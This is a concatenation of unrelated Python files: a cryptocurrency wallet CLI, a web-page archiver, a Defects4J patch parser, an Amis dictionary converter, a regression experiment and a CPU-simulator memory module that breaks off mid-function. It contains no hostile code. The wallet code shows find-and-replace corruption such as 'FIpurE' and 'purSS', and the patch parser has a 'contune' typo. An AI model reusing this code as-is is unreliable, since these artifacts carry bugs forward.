addresses_dst, shor_amounts = _parse_dsts_amounts(dsts, amounts, check_multi_sig_address=True)
fee_shor = _quanta_to_shor(fee)
except Exception as e:
click.echo("Error validating arguments: {}".format(e))
quit(1)
try:
# Create transaction
tx = TransferTransaction.create(addrs_to=addresses_dst,
amounts=shor_amounts,
message_data=message_data,
fee=fee_shor,
purss_pk=address_src_pk,
master_addr=master_addr)
# Sign transaction
tx.sign(signing_object)
# Print result
txjson = tx_unbase64(tx.to_json())
print(txjson)
if not tx.validate():
print("It was not possible to validate the signature")
quit(1)
print("\nTransaction Blob (signed): \n")
txblob = tx.pbdata.SerializeToString()
txblobhex = hexlify(txblob).decode()
print(txblobhex)
# Push transaction
print("Sending to a pur Node...")
stub = ctx.obj.get_stub_public_api()
push_transaction_req = pur_pb2.PushTransactionReq(transaction_signed=tx.pbdata)
push_transaction_resp = stub.PushTransaction(push_transaction_req, timeout=CONNECTION_TIMEOUT)
# Print result
print(push_transaction_resp)
except Exception as e:
print("Error {}".format(str(e)))
@pur.command()
@click.option('--src', type=str, default='', prompt=True, help='source pur address')
@click.option('--master', type=str, default='', prompt=True, help='master pur address')
@click.option('--symbol', default='', prompt=True, help='Symbol Name')
@click.option('--name', default='', prompt=True, help='Token Name')
@click.option('--owner', default='', prompt=True, help='Owner pur address')
@click.option('--decimals', default=0, prompt=True, help='decimals')
@click.option('--fee', type=Decimal, default=0.0, prompt=True, help='fee in Quanta')
@click.option('--ots_key_index', default=1, prompt=True, help='OTS key Index (1..purSS num signatures)')
@click.pass_context
def tx_token(ctx, src, master, symbol, name, owner, decimals, fee, ots_key_index):
"""
Create Token Transaction, that results into the formation of new token if accepted.
"""
initial_balances = []
if decimals > 19:
click.echo("The number of decimal cannot exceed 19 under any possible configuration")
quit(1)
while True:
address = click.prompt('Address ', default='')
if address == '':
break
amount = int(click.prompt('Amount ')) * (10 ** int(decimals))
initial_balances.append(pur_pb2.AddressAmount(address=parse_qaddress(address),
amount=amount))
try:
_, src_purss = _select_wallet(ctx, src)
if not src_purss:
click.echo("A local wallet is required to sign the transaction")
quit(1)
address_src_pk = src_purss.pk
ots_key_index = validate_ots_index(ots_key_index, src_purss)
src_purss.set_ots_index(ots_key_index)
address_owner = parse_qaddress(owner)
master_addr = None
if master:
master_addr = parse_qaddress(master)
# FIpurE: This could be problematic. Check
fee_shor = _quanta_to_shor(fee)
if len(name) > config.dev.max_token_name_length:
raise Exception("Token name must be shorter than {} chars".format(config.dev.max_token_name_length))
if len(symbol) > config.dev.max_token_symbol_length:
raise Exception("Token symbol must be shorter than {} chars".format(config.dev.max_token_symbol_length))
except KeyboardInterrupt:
click.echo("Terminated by user")
quit(1)
except Exception as e:
click.echo("Error validating arguments: {}".format(e))
quit(1)
try:
stub = ctx.obj.get_stub_public_api()
tx = TokenTransaction.create(symbol=symbol.encode(),
name=name.encode(),
owner=address_owner,
decimals=decimals,
initial_balances=initial_balances,
fee=fee_shor,
purss_pk=address_src_pk,
master_addr=master_addr)
tx.sign(src_purss)
push_transaction_req = pur_pb2.PushTransactionReq(transaction_signed=tx.pbdata)
push_transaction_resp = stub.PushTransaction(push_transaction_req, timeout=CONNECTION_TIMEOUT)
print(push_transaction_resp.error_code)
except Exception as e:
print("Error {}".format(str(e)))
@pur.command()
@click.option('--src', type=str, default='', prompt=True, help='source pur address')
@click.option('--master', type=str, default='', prompt=True, help='master pur address')
@click.option('--token_txhash', default='', prompt=True, help='Token Txhash')
@click.option('--dsts', type=str, prompt=True, help='List of destination addresses')
@click.option('--amounts', type=str, prompt=True, help='List of amounts to transfer (Quanta)')
@click.option('--decimals', default=0, prompt=True, help='decimals')
@click.option('--fee', type=Decimal, default=0.0, prompt=True, help='fee in Quanta')
@click.option('--ots_key_index', default=1, prompt=True, help='OTS key Index (1..purSS num signatures)')
@click.pass_context
def tx_transfertoken(ctx, src, master, token_txhash, dsts, amounts, decimals, fee, ots_key_index):
"""
Create Transfer Token Transaction, which moves tokens from src to dst.
"""
if decimals > 19:
click.echo("The number of decimal cannot exceed 19 under any configuration")
quit(1)
try:
addresses_dst, shor_amounts = _parse_dsts_amounts(dsts, amounts, token_decimals=decimals)
bin_token_txhash = parse_hexblob(token_txhash)
master_addr = None
if master:
master_addr = parse_qaddress(master)
# FIpurE: This could be problematic. Check
fee_shor = _quanta_to_shor(fee)
_, src_purss = _select_wallet(ctx, src)
if not src_purss:
click.echo("A local wallet is required to sign the transaction")
quit(1)
address_src_pk = src_purss.pk
ots_key_index = validate_ots_index(ots_key_index, src_purss)
src_purss.set_ots_index(ots_key_index)
except KeyboardInterrupt:
click.echo("Terminated by user")
quit(1)
except Exception as e:
click.echo("Error validating arguments: {}".format(e))
quit(1)
try:
stub = ctx.obj.get_stub_public_api()
tx = TransferTokenTransaction.create(token_txhash=bin_token_txhash,
addrs_to=addresses_dst,
amounts=shor_amounts,
fee=fee_shor,
purss_pk=address_src_pk,
master_addr=master_addr)
tx.sign(src_purss)
push_transaction_req = pur_pb2.PushTransactionReq(transaction_signed=tx.pbdata)
push_transaction_resp = stub.PushTransaction(push_transaction_req, timeout=CONNECTION_TIMEOUT)
print(push_transaction_resp.error_code)
except Exception as e:
print("Error {}".format(str(e)))
@pur.command()
@click.option('--src', type=str, default='', prompt=True, help='source address or index')
@click.option('--master', type=str, default='', prompt=True, help='master pur address')
@click.option('--number_of_slaves', default=0, type=int, prompt=True, help='Number of slaves addresses')
@click.option('--access_type', default=0, type=int, prompt=True, help='0 - All Permission, 1 - Only Mining Permission')
@click.option('--fee', type=Decimal, default=0.0, prompt=True, help='fee (Quanta)')
@click.option('--pk', default=0, prompt=False, help='public key (when local wallet is missing)')
@click.option('--ots_key_index', default=1, prompt=False, help='OTS index (when local wallet is missing)')
@click.pass_context
def slave_tx_generate(ctx, src, master, number_of_slaves, access_type, fee, pk, ots_key_index):
"""
Generates Slave Transaction for the wallet
"""
try:
_, src_purss = _select_wallet(ctx, src)
ots_key_index = validate_ots_index(ots_key_index, src_purss)
src_purss.set_ots_index(ots_key_index)
if src_purss:
address_src_pk = src_purss.pk
else:
address_src_pk = pk.encode()
master_addr = None
if master:
master_addr = parse_qaddress(master)
fee_shor = _quanta_to_shor(fee)
except Exception as e:
click.echo("Error validating arguments: {}".format(e))
quit(1)
slave_purss = []
slave_pks = []
access_types = []
slave_purss_seed = []
if number_of_slaves > 100:
click.echo("Error: Max Limit for the number of slaves is 100")
quit(1)
for i in range(number_of_slaves):
print("Generating Slave #" + str(i + 1))
purss = purSS.from_height(config.dev.purss_tree_height)
slave_purss.append(purss)
slave_purss_seed.append(purss.extended_seed)
slave_pks.append(purss.pk)
access_types.append(access_type)
print("Successfully Generated Slave %s/%s" % (str(i + 1), number_of_slaves))
try:
tx = SlaveTransaction.create(slave_pks=slave_pks,
access_types=access_types,
fee=fee_shor,
purss_pk=address_src_pk,
master_addr=master_addr)
tx.sign(src_purss)
with open('slaves.json', 'w') as f:
json.dump([bin2hstr(src_purss.address), slave_purss_seed, tx.to_json()], f)
click.echo('Successfully created slaves.json')
click.echo('Move slaves.json file from current directory to the mining node inside ~/.pur/')
except Exception as e:
click.echo("Unhandled error: {}".format(str(e)))
quit(1)
@pur.command()
@click.option('--owner', default='', prompt=True, help='source pur address')
@click.pass_context
def token_list(ctx, owner):
"""
Fetch the list of tokens owned by an address.
"""
try:
owner_address = parse_qaddress(owner)
except Exception as e:
click.echo("Error validating arguments: {}".format(e))
quit(1)
try:
stub = ctx.obj.get_stub_public_api()
address_state_req = pur_pb2.GetAddressStateReq(address=owner_address)
address_state_resp = stub.GetAddressState(address_state_req, timeout=CONNECTION_TIMEOUT)
for token_hash in address_state_resp.state.tokens:
get_object_req = pur_pb2.GetObjectReq(query=bytes(hstr2bin(token_hash)))
get_object_resp = stub.GetObject(get_object_req, timeout=CONNECTION_TIMEOUT)
click.echo('Hash: %s' % (token_hash,))
click.echo('Symbol: %s' % (get_object_resp.transaction.tx.token.symbol.decode(),))
click.echo('Name: %s' % (get_object_resp.transaction.tx.token.name.decode(),))
click.echo('Balance: %s' % (address_state_resp.state.tokens[token_hash],))
except Exception as e:
print("Error {}".format(str(e)))
@pur.command()
@click.pass_context
def state(ctx):
"""
Shows Information about a Node's State
"""
stub = ctx.obj.get_stub_public_api()
nodeStateResp = stub.GetNodeState(pur_pb2.GetNodeStateReq())
if ctx.obj.output_json:
click.echo(MessageToJson(nodeStateResp, sort_keys=True))
else:
click.echo(nodeStateResp)
def main():
pur()
if __name__ == '__main__':
main()
|
import datetime
import os.path
import contextlib
import logging
import random
import urllib.parse
import common.database
import Misc.txt_to_img
import WebMirror.Engine
# import WebMirror.runtime_engines
from common.Exceptions import DownloadException, getErrorDiv
from flask import g
from app import app
from app import utilities
import common.global_constants
import WebRequest
import WebRequest.UA_Constants as wr_constants
import common.util.DbCookieJar as dbCj
import common.database as db
def td_format(td_object):
seconds = int(td_object.total_seconds())
periods = [
('y', 60*60*24*365),
('d', 60*60*24),
('h', 60*60),
('m', 60),
('s', 1)
]
if seconds < 1:
return "just fetched"
retstr=[]
for period_name, period_seconds in periods:
if seconds > period_seconds:
period_value, seconds = divmod(seconds,period_seconds)
retstr.append("%s%s" % (period_value, period_name))
return ", ".join(retstr)
WG_POOL = [WebRequest.WebGetRobust(
alt_cookiejar = dbCj.DatabaseCookieJar(db=db, session=db.get_db_session(postfix="_cookie_interface"))
) for x in range(2)]
class RemoteContentObject(object):
def __init__(self, url, db_session = None):
self.log = logging.getLogger("Main.RemoteContentObject")
self.url = url
self.fetched = False
self.job = None
if db_session:
self.db_sess = db_session
else:
self.db_sess = g.session
# print("RemoteContentObject instantiated. Available fetchers: %s" % WebMirror.runtime_engines.fetchers.qsize())
# self.archiver = WebMirror.runtime_engines.fetchers.get()
self.archiver = WebMirror.Engine.SiteArchiver(cookie_lock=False,
new_job_queue=None,
db_interface=self.db_sess,
wg_override=random.choice(WG_POOL)
)
def fetch(self, ignore_cache=False, version=None):
assert not (ignore_cache and version)
self.job = self.archiver.synchronousJobRequest(self.url, ignore_cache)
self.fetched = True
# Override the job instance if we're fetching a old version
if version != None:
self.job = self.job.versions[version]
def getTitle(self):
assert self.fetched
assert self.job
return self.job.title
def getContent(self, relink_replace):
"""
At this point, we have the page content, but we need to
replace the url/resource keys with the proper paths
so that the page will render properly
"""
assert self.fetched
content = self.job.content
if content and relink_replace:
content = utilities.replace_links(content)
return content
def getMime(self):
assert self.fetched
assert self.job
return self.job.mimetype
def getResource(self):
"""
At this point, we have the page content, but we need to
replace the url/resource keys with the proper paths
so that the page will render properly
"""
assert self.fetched
if self.job.state != "complete":
self.log.error("Job resource retreival attempted when job has not been completed!")
self.log.error("Target URL %s", self.job.url)
msg = "Job failed or not fetched!\n"
msg += "Current job state: %s\n" % self.job.state
msg += "URL: %s\n" % self.job.url
img_dat = Misc.txt_to_img.text_to_png(msg)
return "image/png", "genimg.%s.png", img_dat
# job failed
if not self.job.file:
try:
self.fetch(ignore_cache=True)
except DownloadException:
self.log.error("Failure during refetch-attempt for item!")
self.log.error("Refetch attempt for %s", self.job.url)
msg = "Job complete, but no file present?!\n"
msg += "Current job state: %s\n" % self.job.state
msg += "URL: %s\n" % self.job.url
msg += "Returned MIME: %s\n" % self.job.mimetype
msg += "Content size: %s\n" % len(self.job.content)
# msg += "Body: %s\n" % self.job.content
img_dat = Misc.txt_to_img.text_to_png(msg)
return "image/png", "genimg.%s.png", img_dat
if not self.job.file:
self.log.error("Refetch for resource did not return content!")
self.log.error("Target URL %s", self.job.url)
msg = "Job complete, no file present, and refetch failed!\n"
msg += "Current job state: %s\n" % self.job.state
msg += "URL: %s\n" % self.job.url
msg += "Returned MIME: %s\n" % self.job.mimetype
msg += "Content size: %s\n" % len(self.job.content)
# msg += "Body: %s\n" % self.job.content
img_dat = Misc.txt_to_img.text_to_png(msg)
return "image/png", "genimg.%s.png", img_dat
assert self.fetched
assert self.job.file
itempath = os.path.join(app.config['RESOURCE_DIR'], self.job.file_item.fspath)
itempath2 = os.path.join(app.config['RESOURCE_DIR_2'], self.job.file_item.fspath)
fname = self.job.file_item.filename
self.db_sess.commit()
if os.path.exists(itempath):
with open(itempath, "rb") as fp:
contents = fp.read()
elif os.path.exists(itempath2):
with open(itempath2, "rb") as fp:
contents = fp.read()
else:
msg = "Failed to find file resource!\n"
msg += "Current job state: %s\n" % self.job.state
msg += "URL: %s\n" % self.job.url
img_dat = Misc.txt_to_img.text_to_png(msg)
return "image/png", "genimg.%s.png", img_dat
return self.job.mimetype, fname, contents
def getCacheState(self):
assert self.fetched
fetched = self.job.fetchtime
if fetched is None:
fetched = datetime.datetime.now()
ago = datetime.datetime.now() - fetched
return td_format(ago)
def processRaw(self, content, mimetype='text/html', starturl='http://www.example.org'):
# Abuse the fact that functions (including lambda) are fully formed objects
job = lambda:None
job.url = self.url
job.priority = 9
job.starturl = "http://www.example.org"
job.distance = common.database.MAX_DISTANCE-2
job.netloc = urllib.parse.urlsplit(self.url).netloc
fetcher = self.archiver.fetcher(self.archiver.ruleset, target_url=job.url, start_url=job.starturl, db_sess=self.archiver.db_sess, job=job, cookie_lock=False)
print(fetcher)
ret = fetcher.dispatchContent(content, "None", "text/html")
content = ret['contents']
content = utilities.replace_links(content)
return content
def dispatchRetreived(self, parentjob, content, mimetype):
print("Dispatching prefetched content!")
assert bool(content) == True
self.archiver.synchronousDispatchPrefetched(self.url, parentjob, content, mimetype)
def close(self):
# WebMirror.runtime_engines.fetchers.put(self.archiver)
self.archiver = None
# def __del__(self):
# if self.archiver != None:
# print("ERROR! Archiver not released!")
def processRaw(content):
page = RemoteContentObject("http://www.example.org")
try:
ret = page.processRaw(content)
finally:
page.close()
return ret
def getPage(url, ignore_cache=False, version=None):
assert not (version and ignore_cache)
page = RemoteContentObject(url)
if version:
assert isinstance(version, int)
try:
page.fetch(ignore_cache, version)
title = page.getTitle()
content = page.getContent("/view?url=")
cachestate = page.getCacheState()
except DownloadException:
title, content, cachestate = getErrorDiv()
finally:
page.close()
if any([tmp.lower() in url.lower() for tmp in common.global_constants.GLOBAL_BAD_URLS]):
bad_segs = [tmp for tmp in common.global_constants.GLOBAL_BAD_URLS if tmp.lower() in url.lower()]
return (
'Filtered',
'Url %s is filtered by GLOBAL_BAD_URLS (%s)' % (url, bad_segs),
'filtered',
)
return title, content, cachestate
@contextlib.contextmanager
def getPageRow(url, ignore_cache=False, session=None):
page = RemoteContentObject(url, db_session=session)
print("Page object: ", page)
try:
print("doing fetch: ")
page.fetch(ignore_cache=ignore_cache)
print("Fetched. Yielding")
yield page
except DownloadException:
yield None
finally:
page.close()
def getResource(url, ignore_cache=False, session=None):
'''
Get a url that (probably) contains resource content synchronously.
Return is a 4-tuple consisting of (mimetype, filename, filecontent, cache-state)
'''
if any([tmp.lower() in url.lower() for tmp in common.global_constants.GLOBAL_BAD_URLS]):
bad_segs = [tmp for tmp in common.global_constants.GLOBAL_BAD_URLS if tmp.lower() in url.lower()]
return (
'text/ascii',
'Url %s is filtered by GLOBAL_BAD_URLS (%s)' % (url, bad_segs),
'Url %s is filtered by GLOBAL_BAD_URLS (%s)' % (url, bad_segs),
'filtered',
)
page = RemoteContentObject(url, db_session=session)
try:
page.fetch(ignore_cache)
mimetype, fname, content = page.getResource()
cachestate = page.getCacheState()
finally:
page.close()
return mimetype, fname, content, cachestate
def processFetchedContent(url, content, mimetype, parentjob, db_session=None):
page = RemoteContentObject(url, db_session=db_session)
try:
ret = page.dispatchRetreived(parentjob, content, mimetype)
finally:
page.close()
return ret
|
import os
import re
import sys
from os.path import abspath
D4J = abspath('../../analyzers/defects4j/framework/projects')
OUTPUT_DIR = abspath('../auxiliary-data')
class GitHubPatch:
def __init__(self, image_tag, filename, patch_lower, patch_upper):
self.image_tag = image_tag
self.filename = filename
self.patch_lower = patch_lower
self.patch_upper = patch_upper
def to_CSV(self):
return '{},{},{},{}'.format(self.image_tag, self.filename, self.patch_lower, self.patch_upper)
def main(argv=None):
argv = argv or sys.argv
image_tag_file = _validate_input(argv)
patch_list = []
with open(image_tag_file) as file:
for image_tag in file:
image_tag = image_tag.strip()
project, num_id = image_tag.split('-')
try:
file_ranges = _get_files_changed(project, num_id)
patch_list = patch_list + _create_GitHubPatch_list(image_tag, file_ranges)
except:
continue
with open(os.path.join(OUTPUT_DIR, 'code-diff.csv'), 'a') as file:
for patch in patch_list:
file.write(patch.to_CSV() + '\n')
def _get_range(sub_line, sub_range, add_line, add_range):
# Catches @@ -2,5 +2,6 @@
if sub_line and sub_range and add_line and add_range:
sub_line, sub_range, add_line, add_range = int(sub_line), int(sub_range), int(add_line), int(add_range)
# Catches @@ -0,0 +1 @@
elif sub_line and sub_range and add_line and add_range is None:
# elif sub_line and sub_range and add_line and not add_range:
sub_line, sub_range, add_line, add_range = int(sub_line), int(sub_range), int(add_line), 0
# Catches @@ -1 +1,2 @@
elif sub_line and sub_range is None and add_line and add_range:
sub_line, sub_range, add_line, add_range = int(sub_line), 0, int(add_line), int(add_range)
# Catches @@ -1 +1 @@
elif sub_line and sub_range is None and add_line and add_range is None:
sub_line, sub_range, add_line, add_range = int(sub_line), 0, int(add_line), 0
if sub_line < add_line:
range_lower = sub_line
range_upper = add_line + add_range
elif sub_line > add_line:
range_lower = add_line
range_upper = sub_line + sub_range
else: # sub_line == add_line
range_lower = add_line
range_upper = add_line + max(sub_range, add_range)
return range_lower, range_upper
def _get_files_changed(project, num_id):
src_fp = '{}/{}/patches/{}.src.patch'.format(D4J, project, num_id)
test_fp = '{}/{}/patches/{}.test.patch'.format(D4J, project, num_id)
file_ranges = {}
fn_count = 0
fn_map = {}
file_lines = []
for x in [src_fp, test_fp]:
with open(x) as f:
file_lines = [*file_lines, *[line.strip() for line in f.readlines()]]
for line in file_lines:
match_obj = re.search(r'--- (.+)', line, re.M)
if match_obj:
file_line = match_obj.group(1).split('/')
fn = file_line[len(file_line) - 1]
file_ranges[fn] = []
fn_map[fn_count] = fn
fn_count += 1
count = 0
for i in range(1):
#file_ranges[x['filename']] = []
range_lower, range_upper = 0, 0
sub = 0
add = 0
#if 'patch' in x:
if True:
for line in file_lines:
line = line.strip()
if count >= fn_count:
break;
if line is None:
contune
match_obj = re.search(r'^@@ -([0-9]+),?([0-9]+)? \+([0-9]+),?([0-9]+)? @@', line, re.M)
if match_obj:
#if sub != 0 or add != 0:
# print(line)
#file_ranges[fn_map[count]].append((range_lower, range_upper))
range_lower, range_upper = _get_range(match_obj.group(1), match_obj.group(2), match_obj.group(3), match_obj.group(4))
add = 0
file_ranges[fn_map[count]].append((range_lower, range_upper))
count += 1
sub = 0
continue
match_obj = re.search(r'^(\+).*', line, re.M)
if match_obj:
add = add + 1
continue
match_obj = re.search(r'^(-).*', line, re.M)
if match_obj:
sub = sub + 1
continue
#if sub != 0 or add != 0:
#file_ranges[x['filename']].append((range_lower, range_upper))
# file_ranges[fn_map[count-1]].append((range_lower, range_upper))
return file_ranges
def _create_GitHubPatch_list(image_tag, files_changed_list):
patch_list = []
for key in files_changed_list:
for patch in files_changed_list[key]:
range_lower, range_upper = patch[0], patch[1]
patch_list.append(GitHubPatch(image_tag, key, range_lower, range_upper))
return patch_list
def _print_usage():
print('Usage: python3 approx_lines_changed.py <image_tag_filepath>')
print('image_tag_filepath: The filepath to the new-line separated file containing image-tags')
def _validate_input(argv):
if len(argv) != 2:
_print_usage()
sys.exit(1)
image_tag_file = argv[1]
return image_tag_file
if __name__ == '__main__':
sys.exit(main())
|
<reponame>miaoski/amis-safolu<gh_stars>1-10
# -*- coding: utf8 -*-
# Convert .txt files in the same directory to dict-amis.json for moedict
import sys
import codecs
import re
pat = "\[.*?(\d)\]"
reg = re.compile(pat)
JSON = {}
def removeStems(s):
s = s.replace(u'。', '') # Dirty
idx = s.find("(")
if idx!= -1:
s = s[:idx]
return s.strip()
def getStem(s):
stem_r = re.search(ur'\(.+\)', s)
if stem_r:
return s[stem_r.start() + 1:stem_r.end() - 1]
else:
return None
def affixation(s):
import re
from amis_stemmer import gnostic
s = s.replace(u'。', '').strip()
w1 = re.split(r"([\w:'^]+)", s.strip())
w2 = map(gnostic, w1)
return ''.join(w2)
# 加入萌典前端使用的標記
# \ufff9: 阿美語例句
# \ufffa: 英文例句
# \ufffb: 漢語例句
def addsplt(s):
return u'\ufff9'+s[0]+u'\ufffa'+s[1]+u'\ufffb'+s[2]
def mkword(title, definitions, tag, stem):
global JSON
word = {'title': title,
'heteronyms': [{'definitions': definitions}]}
if tag:
word['tag'] = tag
if stem:
word['stem'] = stem
if title in JSON:
print "Add heteronym: " + title
JSON[title]['heteronyms'].append({'definitions': definitions})
else:
JSON[title] = word
def mkdef(defi, examples, link):
defdic = {}
if len(examples) > 0:
defdic['example'] = examples
examples = []
defdic['def'] = defi
if link:
defdic['synonyms'] = map(affixation, link)
return defdic
def readdict(fn):
fp = codecs.open(fn, mode='r', encoding='utf8')
title = None # 詞
tag = None # 疊文
stem = None # 字根
state = None
num_words = 0
for line in fp:
l = line.replace(u'① ', '') \
.replace(u'② ', '') \
.replace(u'③ ', '') \
.replace(u'④ ', '') \
.replace(u'⑤ ', '') \
.replace(u'⑥ ', '') \
.replace(u'⑦ ', '') \
.replace(u'⑧ ', '') \
.replace(u'⑨ ', '')
l = l.strip()
if l == '' and title: # 寫入詞條
num_words += 1
defdic = mkdef(defi, examples, link)
if len(defdic) > 0:
definitions.append(defdic)
mkword(title, definitions, tag, stem)
title = None
state = None
tag = None
stem = None
definitions = []
examples = []
link = []
defi = ""
continue
if l == '': # 空白行
continue
if l[0] == '#': # 註解
continue
if state is None: # 詞
stem = getStem(l)
title = removeStems(l)
definitions = []
examples = []
link = []
defi = ""
state = 'd'
continue
if l[0:2] == '=>': # 相關詞
state = 'l'
if line[0:4] == ' ': # 例句
state = 'e' + state
if state == 'd': # 漢語定義
tag_r = re.search(ur'(\[([^]]+詞|[^]]+語|疊[^]]*|[^]]+綴)\])', l) # [疊2] [日語借詞] 這類
if tag_r:
tag = l[tag_r.start():tag_r.end()]
l = l.replace(tag, '').replace(u'。。', u'。')
if defi!="": # 有上一個def
defdic = mkdef(defi, examples, link)
if len(defdic) > 0:
definitions.append(defdic)
examples = []
link = []
defi = l;
state = 'd'
continue
if state == 'ed': # 阿美語例句
ex = [affixation(l), '', '']
state = 'a'
continue
if state == 'ea': # 漢文例句
ex[2] = l
examples.append(addsplt(ex))
state = 'd'
continue
if state == 'l': # 相關詞
link.append(l[2:])
state = 'd'
if title:
num_words += 1
defdic = mkdef(defi, examples, link )
if len(defdic) > 0:
definitions.append(defdic)
mkword(title, definitions, tag, stem)
fp.close()
print 'Total %d words in %s' % (num_words, fn)
if __name__ == '__main__':
import glob
import json
import re
import codecs
for fn in glob.iglob('*.txt'):
print fn
readdict(fn)
f = codecs.open('dict-amis.json', mode='w', encoding='utf8')
f.write(json.dumps(JSON.values(), indent=2, separators=(',', ':'), ensure_ascii = False, encoding="utf8"))
f.close()
|
# coding: utf-8
from dataclasses import dataclass
import sys
import numpy as np
import numpy.random
import sklearn
import sklearn.metrics
from sklearn.model_selection import cross_val_score
from typing import Callable
# 個人でも簡単に実験できます。
# 適当な入力変数100次元くらい用意して、そのうち10個だけがrelevantなXで y = f(x)+ε の関数 fを何らか生成後、
# f(x) と ε の分散比が1:1000くらいになるようにした人工ランダムデータを生成。
# あとは自分のアルゴが回帰した関数が真のf にどれくらい近いか計ってみればよい
@dataclass
class Dataset:
samples: int
sn_ratio: float
true_f: Callable[[np.ndarray], np.ndarray]
def __init__(self, true_f):
pass
class TrueFunc:
def __init__(self, relevant_dim, dim):
absrate = 0.5
self.dim = dim
self.relevant_dim = relevant_dim
self.absdim = int(relevant_dim * absrate)
self.w = numpy.random.randint(2, size=relevant_dim) * 2 - 1
# x: (sample, dim)
# y: sample
def __call__(self, x: np.ndarray):
# y = X w
y = np.dot(x[:, :self.relevant_dim], self.w[:])
return y
def add_normalized_noise(ys: np.ndarray, sn_ratio):
std = np.std(ys)
ys[:] /= std
ys[:] *= np.sqrt(sn_ratio)
new_ys = ys.copy()
new_ys[:] += np.random.normal(size=ys.shape)
return ys, new_ys
def synthetic_data(sn_ratio=0.001, relevant_x_ratio=0.1):
pass
# true_y: (sample, dim)
def evaluate(true_y: np.ndarray, y: np.ndarray):
return sklearn.metrics.mean_squared_error(true_y, y)
def generate_dataset():
dim = 100
relevant_dim = 10
sn_ratio = 0.001
sample = 10000
f = TrueFunc(relevant_dim, dim)
X = numpy.random.normal(size=(sample, dim))
true_y = f(X)
true_y, y = add_normalized_noise(true_y, sn_ratio=sn_ratio)
return X, true_y, y
if __name__ == "__main__":
print(sys.version)
X, true_y, y = generate_dataset()
from sklearn.linear_model import LinearRegression
from sklearn.svm import SVR
from sklearn.model_selection import KFold
kf = KFold(n_splits=10)
scores = []
count = 1
for train, test in kf.split(X, y):
print(count);
count += 1
# model = SVR(kernel="linear", C=0.01, epsilon=0.1)
model = LinearRegression()
model.fit(X[train, :], y[train])
pred_y = model.predict(X[test, :])
score = sklearn.metrics.mean_squared_error(y[test], pred_y)
true_y_std = np.std(true_y)
score = sklearn.metrics.mean_squared_error(true_y[test] / true_y_std, pred_y / true_y_std)
# print(pred_y, y[test])
# print(y[test])
scores.append(score)
# best_score = sklearn.metrics.accuracy_score(np.sign(true_y), np.sign(y))
best_score = sklearn.metrics.mean_squared_error(true_y, numpy.zeros(y.shape))
print(max(true_y))
print(min(true_y))
print(y.shape)
print(true_y.shape)
print("predition score:", np.mean(np.array(scores)))
print("best score:", best_score)
# print(f(np.ones(dim)*-2))
# print(f(np.ones(dim)*-1))
# print(f(np.ones(dim)*1))
# print(f(np.ones(dim)*2))
pass
|
<gh_stars>100-1000
#=======================================================================
# storage.py
#=======================================================================
from pydgin.jit import elidable, unroll_safe, hint
from debug import Debug, pad, pad_hex
from pydgin.utils import r_uint, specialize
try:
from rpython.rlib.rarithmetic import r_uint32, widen
except ImportError:
# if rpython not in path, we can use normal ints to store data
r_uint32 = int
def widen( value ):
return value
#-----------------------------------------------------------------------
# RegisterFile
#-----------------------------------------------------------------------
class RegisterFile( object ):
def __init__( self, constant_zero=True, num_regs=32, nbits=32 ):
self.num_regs = num_regs
self.regs = [ r_uint(0) ] * self.num_regs
self.debug = Debug()
self.nbits = nbits
self.debug_nchars = nbits / 4
if constant_zero: self._setitemimpl = self._set_item_const_zero
else: self._setitemimpl = self._set_item
def __getitem__( self, idx ):
if self.debug.enabled( "rf" ):
print ':: RD.RF[%s] = %s' % (
pad( "%d" % idx, 2 ),
pad_hex( self.regs[idx],
len=self.debug_nchars ) ),
return self.regs[idx]
@specialize.argtype(2)
def __setitem__( self, idx, value ):
value = r_uint( value )
self._setitemimpl( idx, value )
def _set_item( self, idx, value ):
self.regs[idx] = value
if self.debug.enabled( "rf" ):
print ':: WR.RF[%s] = %s' % (
pad( "%d" % idx, 2 ),
pad_hex( self.regs[idx],
len=self.debug_nchars ) ),
def _set_item_const_zero( self, idx, value ):
if idx != 0:
self.regs[idx] = value
if self.debug.enabled( "rf" ):
print ':: WR.RF[%s] = %s' % (
pad( "%d" % idx, 2 ),
pad_hex( self.regs[idx],
len=self.debug_nchars ) ),
#-----------------------------------------------------------------------
# print_regs
#-----------------------------------------------------------------------
# prints all registers (register dump)
# per_row specifies the number of registers to display per row
def print_regs( self, per_row=6 ):
for c in xrange( 0, self.num_regs, per_row ):
str = ""
for r in xrange( c, min( self.num_regs, c+per_row ) ):
str += "%s:%s " % ( pad( "%d" % r, 2 ),
pad_hex( self.regs[r], len=(self.nbits/4) ) )
print str
#-----------------------------------------------------------------------
# Memory
#-----------------------------------------------------------------------
def Memory( data=None, size=2**10, byte_storage=False ):
# use sparse storage if not translated
try:
from rpython.rlib.objectmodel import we_are_translated
sparse_storage = not we_are_translated()
except ImportError:
sparse_storage = True
if sparse_storage:
print "NOTE: Using sparse storage"
if byte_storage:
return _SparseMemory( _ByteMemory )
else:
return _SparseMemory( _WordMemory )
else:
if byte_storage:
return _ByteMemory( data, size )
else:
return _WordMemory( data, size )
#-------------------------------------------------------------------------
# _WordMemory
#-------------------------------------------------------------------------
# Memory that uses ints instead of chars
class _WordMemory( object ):
def __init__( self, data=None, size=2**10, suppress_debug=False ):
self.data = data if data else [ r_uint32(0) ] * (size >> 2)
self.size = r_uint(len( self.data ) << 2)
self.debug = Debug()
self.suppress_debug = suppress_debug
# TODO: pass data_section to memory for bounds checking
self.data_section = 0x00000000
def bounds_check( self, addr, x ):
# check if the accessed data is larger than the memory size
if addr > self.size:
print ("WARNING: %s accessing larger address than memory size. "
"addr=%s size=%s") % ( x, pad_hex( addr ), pad_hex( self.size ) )
raise Exception()
if addr == 0:
print "WARNING: accessing null pointer!"
raise Exception()
# Special write checks
if x == 'WR' and addr < r_uint( self.data_section ):
print ("WARNING: %s writing address below .data section!!!. "
"addr=%s size=%s") % ( x, pad_hex( addr ), pad_hex( self.data_section ) )
raise Exception()
@specialize.argtype(1)
@unroll_safe
def read( self, start_addr, num_bytes ):
assert 0 < num_bytes <= 4
start_addr = r_uint( start_addr )
word = start_addr >> 2
byte = start_addr & 0b11
if self.debug.enabled( "mem" ) and not self.suppress_debug:
print ':: RD.MEM[%s] = ' % pad_hex( start_addr ),
if self.debug.enabled( "memcheck" ) and not self.suppress_debug:
self.bounds_check( start_addr, 'RD' )
value = 0
if num_bytes == 4: # TODO: byte should only be 0 (only aligned)
value = widen( self.data[ word ] )
elif num_bytes == 2: # TODO: byte should only be 0, 1, 2, not 3
mask = 0xFFFF << (byte * 8)
value = ( widen( self.data[ word ] ) & mask) >> (byte * 8)
elif num_bytes == 1:
mask = 0xFF << (byte * 8)
value = ( widen( self.data[ word ] ) & mask) >> (byte * 8)
else:
